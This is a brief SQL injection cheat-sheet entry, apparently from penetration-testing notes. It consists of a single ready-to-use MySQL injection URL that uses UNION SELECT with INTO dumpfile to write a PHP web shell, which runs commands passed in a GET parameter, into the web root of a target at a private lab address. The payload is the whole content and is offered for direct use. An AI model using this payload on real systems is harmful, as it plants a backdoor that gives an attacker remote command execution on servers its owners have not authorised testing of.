SQL Injection
Table of content
MySQL
# Write PHP shell on system file
http://10.11.1.252:8000/edit_type.php?type_id=5%20+UNION+ALL+SELECT+concat(char(60),%27?php+echo+shell_exec($_GET[%22cmd%22])+?%27,char(62))+INTO+dumpfile+%27/var/www/html/test1.php%27+--+-